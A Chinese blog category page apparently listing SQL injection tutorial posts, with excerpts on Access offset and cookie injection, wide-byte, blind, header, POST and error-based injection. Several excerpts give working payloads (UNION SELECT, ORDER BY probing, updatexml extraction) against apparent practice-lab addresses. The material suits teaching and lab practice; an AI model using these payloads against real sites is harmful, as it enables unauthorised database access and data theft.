SQL注入
文章平均质量分 93
New6ie
这个作者很懒,什么都没留下…
展开
-
SQL注入总结
目录SQL注入(上)字符串截取函数字符串比较函数字符串连接函数mysql中一些基础函数当前数据库名数据库用户名数据库版本路径相关函数注释符号操作符号比较运算符逻辑运算符位运算符延时函数编码函数文件操作函数类型转换information_schemamysql中的空白字符SQL注入(中)注入类型数值型注入字符型注入union联合注入报错注入XPATH语法错误函数特性报错盲注构造布尔条件.转载 2021-03-31 15:03:50 · 262 阅读 · 0 评论 -
Access注入--偏移注入
Access注入--偏移注入Access偏移注入:知道表名,不知道字段名.核心:tables_name.*题目:http://59.63.200.79:8004/1.http://59.63.200.79:8004/ProductShow.asp?id=104#去除id=104,通过cookie传参#http://59.63.200.79:8004/...原创 2020-10-17 16:07:17 · 236 阅读 · 0 评论 -
Access注入--cookie注入
Access注入--cookie注入针对老网站: asp aspx php<5.4以下>题目: http://59.63.200.79:80041.http://59.63.200.79:8004/shownews.asp?id=171-1#页面有变化,存在注入2.http://59.63.200.79:8004/shownews.asp?id=171' and or...原创 2020-10-17 15:59:49 · 244 阅读 · 0 评论 -
宽字节注入
宽字节注入魔术引号:magic_quotes_gpc的作用:当PHP的传参中有特殊字符 ' " \ 就会在前面加转义字符'\',来做一定的过滤' 和 " 内的一切都是字符串,我们输入的东西如果不能闭合单引号和双引号,我们的输入就不会当作代码执行,就无法产生SQL注入解决:1.找一个不需要闭合的地方=> select * from news where id=12.宽...原创 2020-10-17 15:45:36 · 134 阅读 · 0 评论 -
SQL注入----盲注
盲注注入攻击的本质,是把用户输入的数据当做代码执行.1.是用户能够控制输入2.是原本程序要执行的代码,拼接了用户输入的数据.盲注布尔盲注 : order by ,没有显示注入点 对错只显示有无数据延时盲注 :页面无论怎么搞都不变盲注需要掌握的几个函数length() 返回字符串的长度 substr(...原创 2020-10-17 15:40:41 · 147 阅读 · 0 评论 -
SQL注入----- head注入
head注入条件: 需要账号登入成功 有游客留言 有插入,储存,记录数据的功能select *from news where id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)解释:由于updatexml的第二个参数需要Xpath格式的字符串,以~开头的内容不是xml格式的语法,concat()函数为字符串连接函数显然...原创 2020-10-15 09:16:57 · 217 阅读 · 0 评论 -
POST注入
POST注入产生位置: form表单,登入post注入与get注入没有本质区别题目: http://inject2.lab.aqlab.cn:81/Pass-05/index.php’ or 1=1##登入成功,存在注入’ or 1=1 order by 1,2,3,4##4登入失败, 说明有3个字段’ union select 1,2,3 ##2,3显示成功,为查询点’ union select 1,2,database()##显示库名’ union selec原创 2020-10-15 00:28:09 · 154 阅读 · 0 评论 -
显错注入
显错注入题目: http://59.63.200.79:8003/?id=11.http://59.63.200.79:8003/?id=1 and 1=2#异常,存在注入点.2.http://59.63.200.79:8003/?id=1 order by 1,2,3#1,2 正常显示;3 异常;该表有2字段3.http://59.63.200.79:8003/?id=1 union select 1,2#异常,说明:开发时设定只显示一行,解决:第一个查询不显示.4.http://59.原创 2020-10-15 00:19:44 · 128 阅读 · 0 评论